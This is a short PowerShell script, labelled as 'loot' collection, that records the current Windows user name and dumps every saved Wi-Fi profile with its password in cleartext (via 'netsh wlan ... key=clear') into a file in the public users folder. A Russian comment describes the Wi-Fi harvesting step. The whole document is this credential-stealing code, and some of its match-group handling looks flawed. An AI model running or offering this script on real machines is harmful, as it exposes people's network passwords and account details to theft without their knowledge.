& {
    $report = "C:\Users\Public\loot_result.txt"
    "--- LOOT: $(Get-Date) ---" | Out-File $report -Encoding UTF8
    "User: $env:USERNAME" >> $report
    # Сбор Wi-Fi с принудительным выводом
    netsh wlan show profiles | Select-String "\:(.+)$" | % {
        $name = $_.Matches.Groups.Value.Trim()
        $pass = (netsh wlan show profile name="$name" key=clear | Select-String "Key Content\W+\:(.+)$").Matches.Groups.Value.Split(":")[1].Trim()
        if ($pass) { "$name : $pass" >> $report } else { "$name : NO_PASS" >> $report }
    }
    "--- DONE ---" >> $report
}
